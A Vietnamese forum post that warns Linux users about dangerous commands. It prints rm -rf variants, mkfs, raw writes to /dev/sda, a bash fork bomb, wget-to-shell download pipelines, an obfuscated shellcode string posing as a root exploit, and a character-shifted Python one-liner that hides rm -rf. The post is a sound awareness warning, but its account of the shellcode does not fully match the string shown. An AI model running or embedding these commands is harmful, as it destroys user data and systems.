Xin nói rõ đây là những mã thật sự nguy hiểm, không phải trò đùa, và đừng ngốc đến mức copy & paste những câu lệnh này!!!
DANGEROUS COMMANDS — look but DO NOT RUN.
Đây chỉ là một số ít, nhưng có thể giúp cho bạn nhận ra những cách mà chúng lừa bạn làm . Những câu lệnh này cũng có thể được giấu kỹ trong một đoạn mã,tiến trình rất dài do đó hãy thận trọng những dòng code cuối khi bạn cảm thấy có điều gì đó bất thường.
Xoá tất cả các files, xoá thư mục hiện hành…
- Mã: Chọn tất cả
rm -rf / (lệnh này có thể xoá cả hệ thống- cần quyền root)
.............................................................
rm -rf . (xoá thư mục hiện hành)
.............................................................
rm -rf * (xoá các files trong thư mục hiện hành)
.............................................................
rm -rf ~ (xoá home directory của user) - không cần quyền root
Reformat: Dữ liệu trên thiết bị sau lệnh mkfs sẽ bị mất sạch
- Mã: Chọn tất cả
mkfs
.................
mkfs.ext3
.................
mkfs.anything
Block device manipulation: Do raw data được ghi vào block device. Nhiều lần liên tục có thể dẫn đến mất dữ liệu
- Mã: Chọn tất cả
any_command > /dev/sda
....................
dd if=something of=/dev/sda
Forkbomb: Chạy 1 số lượng lớn tiến trình đến khi hệ thống bị đông cứng, buộc bạn phải reset lại máy -> có thể gây hư hỏng dữ liệu, hoặc 1 số thứ khác.
Trong Bourne shells, như Bash: (Cái này trông có thể rất hấp dẫn, kích thích tính tò mò)
- Mã: Chọn tất cả
:(){:|:&};:
- Mã: Chọn tất cả
fork while fork
Tarbomb: Ai đó bảo bạn hãy giải nén 1 file tar vào 1 thư mục đã có sẵn. Từ file đó có thể bung ra hàng triệu files hay thêm những files đã bị sửa đổi vào hệ thống. Bạn nên tập thói quen giải nén vào 1 thư mục rỗng.
Decompression bomb: Thậm chí khi giải nén có thể lên đến vài trăm GB dù khi download dung lượng rất nhỏ, làm đầy đĩa cứng. Bạn không nên lấy dữ liệu từ những nguồn không đáng tin cậy.
Shellscript: Ai đó đưa bạn 1 shellscript và bảo bạn chạy nó. Nó có thể chứa những đoạn mã mà hắn lựa chọn — có thể là tốt hay xấu. Đừng chạy code từ những người không đáng tin.
- Mã: Chọn tất cả
wget http://some_place/some_file
sh ./some_file
- Mã: Chọn tất cả
wget http://some_place/some_file -O- | sh
Compiling code: Ai đó đưa bạn source code và bảo bạn compile. Rất dễ dàng che giấu những code nguy hiểm như một phần nhỏ của source code rất lớn. Đừng chạy compiled code trừ khi đó là những ứng dụng có tên tuổi , lấy từ những nơi tin cậy (i.e. SourceForge, the author’s homepage, distro address).
Một ví dụ khá nổi tiếng , nguỵ trang để đòi hỏi quyền root mà không cần shell:
- Mã: Chọn tất cả
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Với những người mới, cái này giống như một đoạn code vô nghĩa . Tuy nhiên nó lại chạy lệnh rm -rf ~ / & và sẽ phá huỷ hoàn toàn thư mục home của người dùng , thậm chí sẽ xoá tất cả hết là root. Xin hãy nhớ rằng, những thứ như thế này có dạng rất lạ.
Nhắc lại, ở đây không phải là tất cả để bạn có thể dựa vào mà đ1nh giá 1 đoạn code có nguy hiểm hay không.
Một ví dụ có thể làm rất nhanh trong Python
- Mã: Chọn tất cả
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
“sn!.sg!+” đơn giản là rm -rf * shifted 1 ký tự.
Tham khảo từ bài dịch của silverhat